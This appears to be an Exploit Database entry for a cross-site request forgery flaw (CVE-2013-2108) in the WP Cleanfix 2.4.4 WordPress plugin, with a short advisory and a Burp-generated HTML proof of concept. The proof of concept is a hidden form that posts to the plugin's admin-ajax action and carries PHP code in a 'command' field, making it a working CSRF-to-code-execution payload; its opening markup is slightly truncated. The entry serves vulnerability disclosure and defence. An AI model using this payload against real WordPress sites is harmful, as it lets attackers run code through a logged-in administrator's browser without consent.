WordPress Plugin WP Cleanfix - Cross-Site Request Forgery

Author: Enigma Ideas
type: webapps
platform: php
port: 
date_added: 2013-05-16  
date_updated: 2015-10-23  
verified: 1  
codes: CVE-2013-2108;OSVDB-93450  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url:   

raw file: 38520.html  
source: https://www.securityfocus.com/bid/59940/info

The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WP cleanfix 2.4.4 is vulnerable; other versions may also be affected.

SRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpCleanFixAjax" />
      <input type="hidden" name="command" value="echo&#32;phpversion&#40;&#41;&#59;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>